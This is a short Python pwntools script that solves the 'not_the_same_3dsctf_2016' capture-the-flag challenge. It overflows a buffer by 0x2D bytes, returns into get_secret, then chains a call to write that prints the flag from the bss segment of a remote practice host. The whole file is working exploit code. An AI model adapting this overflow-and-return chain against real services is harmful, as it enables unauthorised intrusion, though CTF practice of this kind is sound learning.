#!/usr/bin/env python
# coding=utf-8
from pwn import *
io = remote("node3.buuoj.cn", 27170)
elf = ELF('./not_the_same_3dsctf_2016')
context.log_level = 'debug'

offset= 0x2D
ret = 0x08048196
get_secret = elf.symbols['get_secret']
write = elf.symbols['write']
flag_bss = 0x080ECA2D
# 控制执行流到函数 get_secret 然后在使用 write 函数打印 bss段中的flag
payload = cyclic(offset) + p32(get_secret) + p32(write) + p32(0x00) + p32(1) + p32(flag_bss) + p32(45)

io.sendline(payload)
print(io.recv())
